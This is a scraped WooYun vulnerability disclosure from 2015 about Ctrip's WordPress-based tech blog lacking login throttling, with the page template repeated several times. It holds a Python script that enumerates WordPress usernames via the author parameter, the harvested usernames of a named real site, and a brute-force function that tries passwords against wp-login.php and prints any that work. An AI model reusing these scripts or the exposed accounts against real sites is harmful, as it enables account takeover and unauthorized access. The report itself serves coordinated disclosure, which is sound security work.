携程某管理系统存在缺陷导致无限装库之3 （附验证脚本与结果）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099695

漏洞标题：携程某管理系统存在缺陷导致无限装库之3 （附验证脚本与结果）

漏洞作者：黑暗游侠

提交时间：2015-03-06 11:09

修复时间：2015-04-25 15:52

公开时间：2015-04-25 15:52

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-06：该漏洞正等待厂商内部评估
2015-03-06：厂商已经确认，与白帽子共同解决该漏洞中，漏洞信息仅向厂商公开
2015-03-26：细节向核心白帽子及相关领域专家公开
2015-04-05：细节向普通白帽子公开
2015-04-15：细节向实习白帽子公开
2015-04-25：细节向公众公开

简要描述：

duang 特技 csrc 万能的

详细说明：

携程技术中心：
http://techshow.ctrip.com/
采用wordpress，并且后台未做登录限制和验证

漏洞证明：

但是二次开发过的，wpscan是没办法枚举用户的
验证脚本：

def getUser():
    users = []
    pattern = re.compile(r'author-(\S+) author-')
    file1 = open('userlist','w')
    response = None
    for i in range(1, 200):
        print "start" + str(i) + "page:"
        params = urllib.urlencode({"author":i})
        response = gc.get_url_content('http://techshow.ctrip.com//?author=', data=params)
        if(response != None):
            content = response.decode("utf-8")
            tmpUsers = pyq(content).find("body").attr("class")
            match = pattern.search(tmpUsers)
            if match != None:
                print match.group(1)
                file1.write("\n" + str(i) + ":" + match.group(1))
            else:
                print "error";
        else:
            print 'none'
    
    file1.close();

Result:

admin
leo
junyili
ctriptest

Fuzzing：

def get_password(url,username,password):
    try:
        post_data = {"log":username,"pwd":password,"wp-submit":"%E7%99%BB%E5%BD%95","redirect_to":url+"wp-admin%2F","test":"1"}
        url = url+"wp-login.php"
        cj = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        opener.addheaders = [('Cookie','test_cookie=WP+Cookie+check')]
        urllib2.install_opener(opener) 
        post_data = urllib.urlencode(post_data)
        req = urllib2.Request(url)
        res = urllib2.urlopen(req,post_data)
        html = res.read()
        if re.search(r'<div id="login_error">',html):
            return
        else:
            print "success：%s : %s"%(username,password)
            return
    except:
        return

导入字典，自行测试修复

修复方案：

版权声明：转载请注明来源黑暗游侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-03-06 15:50

厂商回复：

漏洞已确认真实存在，并已安排人处理。
duang 特技 csrc 万能的
十分感谢。

漏洞评价：

2015-04-25 16:04 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

这得是多少钱啊？？？
2015-06-11 14:44 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

携程这个新来的审核员太nb了，加我qq聊着聊着聊到股票，我给他分析了几只股票，然后竟然号突然掉了，显示被封，一查是好友举报，我那个7位qq就他一个好友，so，我简直感到不可思议，会有这种人。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099695

漏洞标题：携程某管理系统存在缺陷导致无限装库之3 （附验证脚本与结果）

相关厂商：携程旅行网

漏洞作者：黑暗游侠

提交时间：2015-03-06 11:09

修复时间：2015-04-25 15:52

公开时间：2015-04-25 15:52

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑暗游侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099695

漏洞标题：携程某管理系统存在缺陷导致无限装库之3 （附验证脚本与结果）

相关厂商：携程旅行网

漏洞作者： 黑暗游侠

提交时间：2015-03-06 11:09

修复时间：2015-04-25 15:52

公开时间：2015-04-25 15:52

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-099695"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：黑暗游侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源黑暗游侠@乌云